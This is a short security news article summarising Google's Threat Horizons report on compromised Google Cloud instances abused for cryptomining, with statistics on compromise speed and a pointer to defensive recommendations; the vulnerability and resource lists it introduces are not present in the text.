In cybersecurity, threats are like mosquitoes on a humid August evening: as soon as you knock one out, another one is already biting at your neck.
For end-users, threat intelligence is key to improving the configuration of environments and defenses. Which is something Google is hoping to help make easier with its new Threat Horizons report.
The report was published by Google's Cybersecurity Action Team and is based on observations from its Threat Analysis Group (TAG) and other internal teams.
Google's stated goal is to provide "actionable intelligence that enables organizations to ensure their cloud environments are best protected against ever evolving threats."
This leads us to the first section of the report, which is dedicated to looking at how malicious actors use compromised Google Cloud instances for cryptocurrency mining.
Cryptocurrency mining has taken off in popularity in the last few years, for end-users and threat actors alike. And Google says you may be paying for cryptominers to use your cloud.
Of 50 recently compromised Google Cloud instances, 86% were used to perform cryptomining, according to the report. Additionally, 10% of the compromised instances were used to conduct scans of other publicly available resources to identify vulnerable systems, and 8% were used to attack other targets.
So how are malicious threat actors gaining access? Google provides the top five exploited vulnerabilities in cloud instances and how frequently they are exploited:
If attackers are attempting to use your compromised cloud instances for cryptomining, they can do so before you finish reading this story.
Researchers found that in 58% of these situations, the cryptomining software was downloaded within 22 seconds of being compromised. Google shares what this means:
"This suggests that the initial attacks and subsequent downloads were scripted events not requiring human intervention. The ability to manually intervene in these situations to prevent exploitation is nearly impossible. The best defense would be to not deploy a vulnerable system or have automated response mechanisms."
The report also says this:
"The shortest amount of time between deploying a vulnerable Cloud instance exposed to the Internet and its compromise was determined to be as little as 30 minutes. In 40% of instances the time to compromise was under eight hours. This suggests that the public IP address space is routinely scanned for vulnerable Cloud instances. It will not be a matter of if a vulnerable Cloud instance is detected, but rather when."
On top of reminding end-users to follow best practices with simple things like using strong passwords, Google provides a list of recommendations and resources for people to follow in order to avoid their cloud being used for cryptomining.
These resources are:
Register for upcoming SecureWorld events and web conferences that will help meet your cybersecurity needs.